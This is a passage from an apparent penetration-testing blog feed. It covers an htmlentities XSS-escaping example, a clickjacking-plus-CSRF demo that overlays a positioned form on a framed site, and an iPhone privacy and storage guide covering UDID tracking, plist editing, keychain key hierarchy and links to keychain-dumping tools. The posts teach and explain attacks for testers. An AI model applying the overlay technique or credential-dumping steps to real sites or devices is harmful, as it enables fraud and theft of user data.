<pre style="-webkit-text-stroke-width: 0px; background-color: #f0f0f0; background-position: initial initial; background-repeat: initial initial; border: 1px dashed rgb(204, 204, 204); color: black; font-family: arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; height: auto; letter-spacing: normal; line-height: 20px; margin: 0px; orphans: auto; overflow: auto; padding: 0px; text-align: left; text-indent: 0px; text-transform: none; widows: auto; width: 646.4630737304688px; word-spacing: 0px;"><code style="color: black; word-wrap: normal;">1. // This function will convert both double and single quotes. </code></pre>
<pre style="-webkit-text-stroke-width: 0px; background-color: #f0f0f0; background-position: initial initial; background-repeat: initial initial; border: 1px dashed rgb(204, 204, 204); color: black; font-family: arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; height: auto; letter-spacing: normal; line-height: 20px; margin: 0px; orphans: auto; overflow: auto; padding: 0px; text-align: left; text-indent: 0px; text-transform: none; widows: auto; width: 646.4630737304688px; word-spacing: 0px;"><code style="color: black; word-wrap: normal;">2. htmlentities($username , ENT_QUOTES);
</code></pre>
<br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">Input: </span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <script>alert(1)</script>
</code></pre>
<br />
<span style="font-family: "cambria"; font-size: 16.363636016845703px;">Output:</span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> &#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x7 4;&#x28;&#x31;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;
</code></pre>
<br />
<br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">With </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">htmlentities, </span><span style="font-family: "cambria"; font-size: 12.000000pt;">all characters which have HTML character entity equivalents are translated
into these entities (displayed above). </span><br />
<br />
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">References:</span><br />
<br />
<ol>
<li><span style="color: blue; font-family: "cambria"; font-size: 12pt;">https://www.owasp.org/index.php/Account_lockout_attack</span></li>
<li><span style="color: blue; font-family: "cambria"; font-size: 12pt;">http://stackoverflow.com/questions/17217777/difference-‐between-‐unset-‐and-‐session-‐unset-‐
in-‐php</span></li>
<li><span style="color: blue; font-family: "cambria"; font-size: 12pt;">http://shiflett.org/articles/session-‐fixation</span></li>
<li><span style="color: blue; font-family: "cambria"; font-size: 12pt;">http://shiflett.org/articles/session-‐hijacking </span></li>
</ol>
<br /><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-28984026157562040522014-04-06T10:53:00.001-07:002014-04-07T01:29:29.349-07:00Clickalicious Candies...<b>Introduction</b><br />
<b><br /></b>
This articles is written by me to show that Clickjaking should not be underestimated as a vulnerability, especially when combined with other vulnerabilities. Clickjaking (User Interface redress attack) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. That is good in theory , but how can someone do that in practice? The answer is simple , <b>ridiculously easy...</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlGnt6JWmNV_hdNCZB8QiOSJCtF-UAU3MWldeiYQn7y2DM0X8TjTmrvmmfgMkb9lkITGT8vF9u1KKu3AWa-IaVUICZ7WqlRdkCrASXpSCPUxuVWDm9LWxmSaO-_9JeJgeUqdhtB_7SUOQ/s1600/somethinghot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlGnt6JWmNV_hdNCZB8QiOSJCtF-UAU3MWldeiYQn7y2DM0X8TjTmrvmmfgMkb9lkITGT8vF9u1KKu3AWa-IaVUICZ7WqlRdkCrASXpSCPUxuVWDm9LWxmSaO-_9JeJgeUqdhtB_7SUOQ/s1600/somethinghot.png" height="200" width="320" /></a></div>
<br />
Even a script kiddy can become a "hacker" con-artist when combining vulnerabilities. In this post I am going to show how a simple CSRF attack can actually be combined with a clickjaking attack, of course the same think can happen with vulnerabilities such as session fixation and XSS.<br />
<br />
<b>The Clickalicious Attack</b><br />
<br />
In order to perform the attack we would have to be based in the following assumptions:<br />
<ol>
<li>We identified a website that is vulnerable to Clickjaking (e.g. is missing the X-Frame-Options) .</li>
<li>The same Web Site is also vulnerable to CSRF (e.g. the CSRF is a simple html form). </li>
<li>The CSRF attack exploits a vulnerability that a malicious user can actually submit the form with polluted hidden form fields (for simplicity I am going to use a simple html form for the demo). </li>
</ol>
<b>Step 1: </b>Frame the vulnerable web site to our iframe, in our example I am going to use www.w3sschools.com (such a lovely site).<br />
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <iframe src="http://www.w3schools.com"></iframe>
</code></pre>
<br />
The visual outcome of this code wold be:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDn6TzOSlsGilQ87PGi_d_mUAIaWxv5nuzckeH5hk9hNEeayVf0ikTCzeo2OnYi-P6FR8s22v3P30viJqmZUlRCTcMss09Ybqv8UZoIp_CR4f4e3h0XD1ehpqkJ6Ubj0CUYdbFDr96iaM/s1600/c1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDn6TzOSlsGilQ87PGi_d_mUAIaWxv5nuzckeH5hk9hNEeayVf0ikTCzeo2OnYi-P6FR8s22v3P30viJqmZUlRCTcMss09Ybqv8UZoIp_CR4f4e3h0XD1ehpqkJ6Ubj0CUYdbFDr96iaM/s1600/c1.png" height="158" width="320" /></a></div>
<b><br /></b><b>Note:</b> The picture above displays only the iframe and not the whole page. In this particular example the html page was loaded from my hard disk.<br />
<b><br /></b>
<b>Step 2: </b>Project the CSRF to the vulnerable web site within the iframe created in Step 1. The simple source code to do that would be:<br />
<br />
<pre style="background-color: #f0f0f0; background-position: initial initial; background-repeat: initial initial; border: 1px dashed rgb(204, 204, 204); font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <html>
<body>
<head>
<style>
</code><code style="word-wrap: normal;"><span style="color: red;"> form
{
position:absolute;
left:30px;
top:100px;
}</span></code><code style="color: black; word-wrap: normal;">
</style>
</head>
<form>
First name: <input type="text" name="firstname"><br>
Last name: <input type="text" name="lastname">
</form>
<iframe src="http://www.w3schools.com"></iframe>
</body>
</html>
</code></pre>
<br />
See the CSS absolute element? The CSS 2.1 defines three positioning schemes:<br />
<ol>
<li>Normal flow</li>
<li>Absolute positioning</li>
<li>Position: top, bottom, left, and right</li>
</ol>
Out of these three CSS features we are interested in the Absolute positioning feature. An absolutely positioned feature has no place in, and <u>no effect on, the normal flow of other items</u>. It occupies its assigned position in its container independently of other items.The visual outcome of this code wold be:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7eKt85dX9plZEwooJGK2ggiL2FpJeiXEBQZL3-JAMKh85JKdw1w8ANJLDuHamLMRWLLTMJm04aYUcVDj69Ec4d18tj1CoNPbrNRPnhkKtv8v73x_gZBZOU0VUxUObhl_fIHBuiqBxv_M/s1600/c3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7eKt85dX9plZEwooJGK2ggiL2FpJeiXEBQZL3-JAMKh85JKdw1w8ANJLDuHamLMRWLLTMJm04aYUcVDj69Ec4d18tj1CoNPbrNRPnhkKtv8v73x_gZBZOU0VUxUObhl_fIHBuiqBxv_M/s1600/c3.png" height="161" width="320" /></a></div>
<br />
<b>Note:</b> The same exploit can be build using a stored XSS. The only difference would be that you would have to project the vulnerable CSRF within the space controlled by the XSS (without taking advantage of a Clickjaking vulnerability).<br />
<br />
Tools such as NoScript would be able to detect the Clickjaking attack:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA5kkveL2j7KJpqhCDjhYKoOpJL-u9sl6ez1crW6i5DvHAbpMmOnKOS06NXGSdVRWD6LJUeqjC3ShKzU06JmVdsJiRhwUIqvI6LiO-VMnlI-G2jkGa_nqWo4OMvlh0_AMmqQWDfuWFjjQ/s1600/c4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA5kkveL2j7KJpqhCDjhYKoOpJL-u9sl6ez1crW6i5DvHAbpMmOnKOS06NXGSdVRWD6LJUeqjC3ShKzU06JmVdsJiRhwUIqvI6LiO-VMnlI-G2jkGa_nqWo4OMvlh0_AMmqQWDfuWFjjQ/s1600/c4.png" /></a></div>
<br />
<b>Note:</b> See the icon stating that the script was blocked.<br />
<br />
<b>Epiloge</b><br />
<br />
Next time you run a penetration test , think again before you characterize a Clickjaking as low!! especially if it is a login page. And be aware of the Script Kiddies. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJyUF8o0QtIc6vPlibP082zg1txB_exgsrfoqikQpdnnkwfxbBjYDztToXEUENzaYe5j2Dp6fy8wE3PKS9wqZDIQNX8zyLSrEEoMF8DKgYJ-eXkv6Nvtunnj55cBFKrC5Kn-9lOekEMOQ/s1600/eee.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJyUF8o0QtIc6vPlibP082zg1txB_exgsrfoqikQpdnnkwfxbBjYDztToXEUENzaYe5j2Dp6fy8wE3PKS9wqZDIQNX8zyLSrEEoMF8DKgYJ-eXkv6Nvtunnj55cBFKrC5Kn-9lOekEMOQ/s1600/eee.jpg" height="214" width="320" /></a></div>
<br />
The moto of this article is going to be think before you click...<br />
<br />
<b>References:</b><br />
<ol>
<li><a href="http://www.w3schools.com/cssref/pr_class_position.asp" target="_blank">http://www.w3schools.com/cssref/pr_class_position.asp </a></li>
<li><a href="http://en.wikipedia.org/wiki/Cascading_Style_Sheets#Positioning" target="_blank">http://en.wikipedia.org/wiki/Cascading_Style_Sheets#Positioning</a></li>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-60452549238825592172013-09-21T14:06:00.002-07:002013-09-21T14:41:55.153-07:00The Hackers Guide To Dismantling IPhone (Part 3)<b>Introduction</b><br />
<b><br /></b>
On May 7, 2013, as a German court ruled that the iPhone maker must alter its company policies for handling customer data, since these policies have been shown to violate Germany’s privacy laws.<br />
<br />
The news first hit the Web via Bloomberg, who reports that:<br />
<br />
<i><span style="color: purple;">"Apple Inc. (AAPL), already facing a U.S. privacy lawsuit over its information-sharing practices, was told by a German court to change its rules for handling customer data.</span></i><br />
<i><span style="color: purple;">A Berlin court struck down eight of 15 provisions in Apple’s general data-use terms because they deviate too much from German laws, a consumer group said in a statement on its website today. The court said Apple can’t ask for “global consent” to use customer data or use information on the locations of customers.</span></i><br />
<i><span style="color: purple;">While Apple previously requested “global consent” to use customer data, German law requires that customers know in detail exactly what is being requested. Further to this, Apple may no longer ask for permission to access the names, addresses, and phone numbers of users’ contacts."</span></i><br />
<br />
Finally, the court also prohibited Apple from supplying such data to companies which use the information for advertising. But why does this happen?<br />
<br />
<b>More Technical on privacy issues</b><br />
<b><br /></b>
<br />
Every iPhone has an associated unique device Identifier derived from a set of hardware attributes called UDID. UDID is burned into the device and one cannot remove or change it. However, it can be spoofed with the help of tools like UDID Faker.<br />
<br />
UDID of the latest iPhone is computed with the formula given below:<br />
<br />
<i><span style="color: purple;">UDID = SHA1(Serial Number + ECID + LOWERCASE (WiFi Address) + LOWERCASE(Bluetooth Address))</span></i><br />
<br />
UDID is exposed to application developers through an API which would allow them to access the UDID of an iPhone without requiring the device owner’s permission. The code snippet shown below is used to collect the UDID of a device, later which can used to track the user’s behavior.<br />
<br />
<span style="background-color: white; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 12px; line-height: 13.1875px; white-space: pre;">NSString *uniqueIdentifier = [device uniqueIdentifier]</span><br />
<br />
With the help of UDID, it is possible to observe the user’s browsing patterns and trace out the user’s geo location. As it is possible to locate the user’s exact location with the help of a device UDID, it became a big privacy concern. More possible attacks are documented in Eric Smith-iPhone application privacy issues whitepaper. Eric’s research shows that 68% of applications silently send UDIDs to the servers on the internet. A perfect example of a serious privacy security breach is social gaming network Openfient.<br />
<br />
OpenFeint was a social platform for mobile games Android and iOS. It was developed by Aurora Feint, a company named after a video game by the same developers. The platform consisted of an SDK for use by games, allowing its various social networking features to be integrated into the game's functionality. <u>OpenFeint was discontinued at the end of 2012</u>.<br />
<br />
Openfient collected device UDID’s and misused them by linking it to real world user identities (like email address, geo locations latitude & longitude, Facebook profile picture) and making them available for public access, resulting in a serious privacy breach.<br />
<br />
While penetration testing, observe the network traffic for UDID transmission. UDID in the network traffic indicates that the application is collecting the device identifier or might be sending it to a third party analytic company to track the user’s behavior. In iOS 5, Apple has deprecated the API that gives access to the UDID, and it will probably remove the API completely in future iOS releases. Development best practice is not to use the API that collects the device UDIDs, as it breaches the privacy of the user. If the developers want to keep track of the user’s behaviour, create a unique identifier specific to the application instead of using UDID. The disadvantage with the application specific identifier is that it only identifies an installation instance of the application, and it does not identify the device.<br />
<br />
Apart from UDID, applications may transmit personal identifiable information like age, name, address and location details to third party analytic companies. Transmitting personal identifiable information to third party companies without the user’s knowledge also violates the user’s privacy. So, during penetration testing carefully observe the network traffic for the transmission of any important data.<br />
Example: Pandora application was used to transmit user’s age and zip code to a third party analytic company (doubleclick.net) in clear text. For the applications which require the user’s geo location (ex: check-in services) to serve the content, it is always recommended to use the least degree of accuracy necessary. This can be achieved with the help of accuracy constants defined in core location framework (ex: <span style="color: purple;">CLLocationAccuracy kCLLocationAccuracyNearestTenMeters</span>).<br />
<b><br /></b>
<b>Identifying UUID transmission</b><br />
<br />
Identifying if the UUID of the Iphone is transmitted is easy. It can be done through a Man In The Middle attack or a sniffer such as Wireshark. For example by using Wireshark to sniff traffic you can very easily identify if the UUID is transmitted if you follow the tcp stream.<br />
<br />
<b>Local data storage security issues</b><br />
<br />
IPhone stores the data locally on the device to maintain essential information across the application execution or for a better performance or offline access. Also, developers use the local device storage to store information such as user preferences and application configurations. As device theft is becoming an increasing concern, especially in the enterprise, insecure local storage is considered to be the top risk in mobile application threats. A recent survey conducted by Viaforensics revealed that 76 percent of mobile applications are storing user’s information on the device. <u>10 percent of them are </u><br />
<u>even storing the plain text passwords on the phone</u>.<br />
<br />
Sensitive information stored on the iPhone can be obtained by attackers in several ways. A few of the ways are listed below -<br />
<br />
<u>From Backups</u><br />
<br />
When an iPhone is connected to iTunes, iTunes automatically takes a backup of everything on the device. Upon backup, sensitive files will also end up on the workstation. So an attacker who gets access to the workstation can read the sensitive information from the stored backup files.<br />
<br />
More specifically backed-up information includes purchased music, TV shows, apps, and books; photos and video in the Camera Roll; device settings (for example, Phone Favorites, Wallpaper, and Mail, Contacts, Calendar accounts); app data; Home screen and app organization; Messages (iMessage, SMS, and MMS), ringtones, and more. Media files synced from your computer aren’t backed up, but can be restored by syncing with iTunes.<br />
<br />
iCloud automatically backs up the most important data on your device using iOS 5 or later. After you have enabled Backup on your iPhone, iPad, or iPod touch in <u>Settings > iCloud > Backup & Storage</u>, it will run on a daily basis as long as your device is:<br />
<br />
<ul>
<li>Connected to the Internet over Wi-Fi</li>
<li>Connected to a power source</li>
<li>Screen locked</li>
</ul>
<br />
<b>Note:</b>You can also back up manually whenever your device is connected to the Internet over Wi-Fi by choosing Back Up Now from <u>Settings > iCloud > Storage & Backup</u>.<br />
<br />
<u>Physical access to the device</u><br />
<br />
People lose their phones and phones get stolen very easily. In both cases, an attacker will get physical access to the device and read the sensitive information stored on the phone. The passcode set to the device will not protect the information as it is possible to brute force the iPhone simple passcode within 20 minutes. To know more details about iPhone passcode bypass go through the iPhone Forensics article available at – http://resources.infosecinstitute.com/iphone-forensics/.<br />
<br />
<u>Malware</u><br />
<br />
Leveraging a security weakness in iOS may allow an attacker to design a malware which can steal the files on the iPhone remotely. Practical attacks are demonstrated by Eric Monti in his presentation on iPhone Rootkit.<br />
<br />
<b>Directory structure</b><br />
<br />
In iOS, applications are treated as a bundle represented within a directory. The bundle groups all the application resources, binaries and other related files into a directory. In iPhone, applications are executed within a jailed environment (sandbox or seatbelt) with mobile user privileges. Unlike Android UID based segregation, iOS applications runs as one user. Apple says “The sandbox is a set of fine-grained controls limiting an application’s access to files, preferences, network resources, hardware, and so on. Each application has access to the contents of its own sandbox but cannot access other applications’ sandboxes. When an application is first installed on a device, the system creates the application’s home directory, sets up some key subdirectories, and sets up the security privileges for the sandbox“. A sandbox is a restricted environment that prevents applications from accessing unauthorized resources; however, upon iPhone JailBreak, sandbox protection gets disabled.<br />
<br />
When an application is installed on the iPhone, it creates a directory with a unique identifier under /var/mobile/Applications directory. Everything that is required for an application to execute will be contained in the created home directory. Typical iPhone application home directory structure is listed below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/041812_1555_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/041812_1555_1.png" /></a></div>
<br />
<b>Plist files</b><br />
<br />
A property List (Plist file) is a structured binary formatted file which contains the essential configuration of a bundle executable in <u>nested key value pairs. Plist files are used to store the user preferences and the configuration information of an application.</u> For example, Gaming applications usually store game<br />
levels and game scores in the Plist files. In general, applications store the Plist files under [Application's Home Directory]/documents/preferences folder. Plist can either be in XML format or in binary format.<br />
<br />
As XML files are not the most efficient means of storage, most of the applications use binary formatted Plist files. Binary formatted data stored in the Plist files can be easily viewed or modified using Plist editors (ex: plutil). Plist editors convert the binary formatted data into an XML formatted data, later it can be edited easily. Plist files are primarily designed to store the user preferences & application configuration; however, the applications may use <u>Plist files to store clear text usernames, passwords and session related information</u>.<br />
<br />
<b>ICanLocalize</b><br />
<br />
ICanLocalize allows online translating plist files as part of a Software Localization project. A parser will go through the plist file. It will extract all the texts that need translation and make them available to the translators. Translators will translate only the texts, without worrying about the file format.<br />
<br />
When translation is complete, the new plist file is created. It has the exact same structure as the original file and only the right fields translated.<br />
<br />
For example, have a look at this plist file:<br />
<br />
<pre style="background-color: #f9f9f9; border: 1px solid rgb(204, 204, 204); color: #404040; font-size: 12px; line-height: 19px; padding: 9px;"><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Year Of Birth</key>
<integer>1965</integer>
<key>Photo</key>
<data>
PEKBpYGlmYFCPAfekjf39495265Afgfg0052fj81DG==
</data>
<key>Hobby</key>
<string><strong>Swimming</strong></string>
<key>Jobs</key>
<array>
<string><strong>Software engineer</strong></string>
<string><strong>Salesperson</strong></string>
</array>
</dict>
</plist></pre>
<br />
<b>Note:</b> It includes several keys and values. There’s a binary Photo entry, an integer field calls Year of Birth and text fields called Hobby and Jobs (which is an array). If we translate this plist manually, we need to carefully watch out for strings we should translate and others that we must not translate.<br />
<br />
Of this entire file, we need to translate only the items that appear inside the <string> tags. Other texts must remain unchanged.<br />
<br />
<b>Translating as plist info</b><br />
<br />
Once you’re logged in to ICanLocalize, click on Translation Projects -> Software Localization and create a new project.<br />
<br />
Name it and give a quick description. You don’t need to tell about the format of plist files. Our system knows how to handle it. Instead, explain about what the plist file is used for. Tell about your application, target audience and the preferred writing style. Then, upload the plist file. You will see a list of texts which the parser extracted.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.icanlocalize.com/site/wp-content/uploads/2010/06/plist-extract-results.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.icanlocalize.com/site/wp-content/uploads/2010/06/plist-extract-results.png" height="353" width="640" /></a></div>
<br />
<b>Note:</b> Manipulating and altering the plist files can be done through the <a href="http://www.macroplant.com/iexplorer/" target="_blank">iExplorer</a>. Simple download iExplorer open plist files, modify them and then insert them back again.<br />
<br />
<b>Keychain Storage </b><br />
<br />
<u>Keychain is an encrypted container (128 bit AES algorithm) and a centralized SQLite database that holds identities & passwords for multiple applications and network services, with restricted access rights. On the iPhone, keychain SQLite database is used to store the small amounts of sensitive data like usernames, passwords, encryption keys, certificates and private keys.</u> In general, iOS applications store the user’s credentials in the keychain to provide transparent authentication and to not prompt the user every time for login.<br />
<br />
iOS applications use the keychain service library/API:<br />
<br />
<ul>
<li><span style="color: purple;"><i>secItemAdd</i></span></li>
<li><span style="color: purple;"><i>secItemDelete</i></span></li>
<li><span style="color: purple;"><i>secItemCopyMatching & secItemUpdate methods</i></span></li>
</ul>
<br />
<b>Note:</b> These keywords can be used for source code reviews (identifying the location of the data)<br />
<br />
These keywords are used to read and write data to and from the keychain. Developers leverage the keychain services API to dictate the operating system to store sensitive data securely on their behalf, instead of storing them in a property list file or a plaintext configuration file. On the iPhone, the keychain SQLite database file is located at – <span style="color: purple;"><i>/private/var/Keychains/keychain-2.db</i></span>.<br />
<br />
Keychain contains a number of keychain items and each keychain item will have encrypted data and a set of unencrypted attributes that describes it. Attributes associated with a keychain item depend on the keychain item class (<i><span style="color: purple;">kSecClass</span></i>). In iOS, keychain items are classified into 5 classes – generic passwords (<i><span style="color: purple;">kSecClassGenericPassword</span></i>), internet passwords (<span style="color: purple;"><i>kSecClassInternetPassword</i></span>), certificates (<i><span style="color: purple;">kSecClassCertificate</span></i>), keys (<i><span style="color: purple;">kSecClassKey</span></i>) and digital identities (<i><span style="color: purple;">kSecClassIdentity, identity=certificate + key</span></i>). In the iOS keychain, all the keychain items are stored in 4 tables – genp, inet, cert and keys (shown in Figure 1). Genp table contains generic password keychain items, inet table contains Internet password keychain items, and cert & keys tables contain certificates, keys and digital identity keychain items.<br />
<br />
<b>Keys hierarchy</b><br />
<b><br /></b>
Here is the keychain stracture:<br />
<br />
<ul>
<li>UID key : hardware key embedded in the application processor AES engine, unique for each device. This key can be used but not read by the CPU. Can be used from bootloader and kernel mode. Can also be used from userland by patching IOAESAccelerator.</li>
<li>UIDPlus key : new hardware key referenced by the iOS 5 kernel, does not seem to be available yet, even on newer A5 devices.</li>
<li>Key 0x835 : Computed at boot time by the kernel. Only used for keychain encryption in iOS 3 and below. Used as "device key" that protects class keys in iOS 4.</li>
<li>key835 = AES(UID, bytes("01010101010101010101010101010101"))</li>
<li>Key 0x89B : Computed at boot time by the kernel. Used to encrypt the data partition key stored on Flash memory. Prevents reading the data partition key directly from the NAND chips.</li>
<li>key89B = AES(UID, bytes("183e99676bb03c546fa468f51c0cbd49"))</li>
<li>EMF key : Data partition encryption key. Also called "media key". Stored encrypted by key 0x89B</li>
<li>DKey : NSProtectionNone class key. Used to wrap file keys for "always accessible" files on the data partition in iOS 4. Stored wrapped by key 0x835</li>
<li>BAG1 key : System keybag payload key (+initialization vector). Stored unencrypted in effaceable area.</li>
<li>Passcode key : Computed from user passcode or escrow keybag BagKey using Apple custom derivation function. Used to unwrap class keys from system/escrow keybags. Erased from memory as soon as the keybag keys are unwrapped.</li>
<li>Filesystem key (f65dae950e906c42b254cc58fc78eece) : used to encrypt the partition table and system partition (referred to as "NAND key" on the diagram)</li>
<li>Metadata key (92a742ab08c969bf006c9412d3cc79a5) : encrypts NAND metadata</li>
</ul>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://wiki.iphone-dataprotection.googlecode.com/hg/ios4_encryption_hierarchy.svg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://wiki.iphone-dataprotection.googlecode.com/hg/ios4_encryption_hierarchy.svg" height="449" width="640" /></a></div>
<br />
<br />
<u>iOS 3 and below</u><br />
<u><br /></u>
16-byte IV - AES128(key835, IV, data + SHA1(data))<br />
<br />
<u>iOS 4</u><br />
<br />
version (0)|protection_class - AESWRAP(class_key, item_key) (40 bytes)|AES256(item_key, data)<br />
<br />
<u>iOS 5</u><br />
<br />
version (2)<span class="Apple-tab-span" style="white-space: pre;"> </span> protection_class<span class="Apple-tab-span" style="white-space: pre;"> </span> len_wrapped_key<span class="Apple-tab-span" style="white-space: pre;"> </span> AESWRAP(class_key, item_key) (len_wrapped_key)<span class="Apple-tab-span" style="white-space: pre;"> </span> AES256_GCM(item_key, data)<span class="Apple-tab-span" style="white-space: pre;"> </span> integrity_tag (16 bytes)<br />
<b><br /></b>
<b>Keychain tools</b><br />
<b><br /></b>
<br />
<ol>
<li><a href="https://github.com/ptoomey3/Keychain-Dumper/blob/master/main.m">https://github.com/ptoomey3/Keychain-Dumper/blob/master/main.m</a></li>
<li><a href="https://code.google.com/p/iphone-dataprotection/downloads/detail?name=keychain_dump">https://code.google.com/p/iphone-dataprotection/downloads/detail?name=keychain_dump</a></li>
</ol>
<br />
<b><br /></b>
<b>Notes</b><br />
<b><br /></b>
In the recent versions of iOS (4 & 5), by default, the keychain items are stored using the kSecAttrAccessibleWhenUnlocked data protection accessibility constant. However the data protection is effective only with a device passcode, which implies that sensitive data stored in the keychain is secure only when a user sets a complex passcode for the device. But iOS applications cannot enforce the user to set a device passcode. So if iOS applications rely only on the Apple provided security they can be broken if iOS security is broken.<br />
<b><br /></b>
<b>Epiloge</b><br />
<br />
iOS application security can be improved by understanding the shortcomings of the current implementation and writing one’s own implementation that works better. In the case of the keychain, iOS application security can be improved by using the custom encryption (using built-in crypto API) along with the data protection API while adding the keychain entries. If custom encryption is implemented it is recommended to not to store the encryption key on the device.<br />
<b><br /></b>
<b>References:</b><br />
<br />
<ol>
<li><a href="http://appadvice.com/appnn/tag/privacy-issues">http://appadvice.com/appnn/tag/privacy-issues</a></li>
<li><a href="http://resources.infosecinstitute.com/pentesting-iphone-applications-2/">http://resources.infosecinstitute.com/pentesting-iphone-applications-2/</a></li>
<li><a href="http://cryptocomb.org/Iphone%20UDIDS.pdf">http://cryptocomb.org/Iphone%20UDIDS.pdf</a></li>
<li><a href="http://en.wikipedia.org/wiki/OpenFeint">http://en.wikipedia.org/wiki/OpenFeint</a></li>
<li><a href="http://resources.infosecinstitute.com/iphone-forensics/">http://resources.infosecinstitute.com/iphone-forensics/</a></li>
<li><a href="http://support.apple.com/kb/HT1766">http://support.apple.com/kb/HT1766</a></li>
<li><a href="http://stackoverflow.com/questions/6697247/how-to-create-plist-files-programmatically-in-iphone">http://stackoverflow.com/questions/6697247/how-to-create-plist-files-programmatically-in-iphone</a></li>
<li><a href="http://www.icanlocalize.com/site/tutorials/how-to-translate-plist-files/">http://www.icanlocalize.com/site/tutorials/how-to-translate-plist-files/</a></li>
<li><a href="http://www.macroplant.com/iexplorer/">http://www.macroplant.com/iexplorer/</a></li>
<li><a href="http://resources.infosecinstitute.com/iphone-penetration-testing-3/">http://resources.infosecinstitute.com/iphone-penetration-testing-3/</a></li>
<li><a href="http://sit.sit.fraunhofer.de/studies/en/sc-iphone-passwords-faq.pdf">http://sit.sit.fraunhofer.de/studies/en/sc-iphone-passwords-faq.pdf</a></li>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-1933239741383381672013-09-21T10:39:00.005-07:002013-09-21T10:39:39.381-07:00The Hackers Guide To Dismantling IPhone (Part 2)<b>Introduction</b><br />
<br />
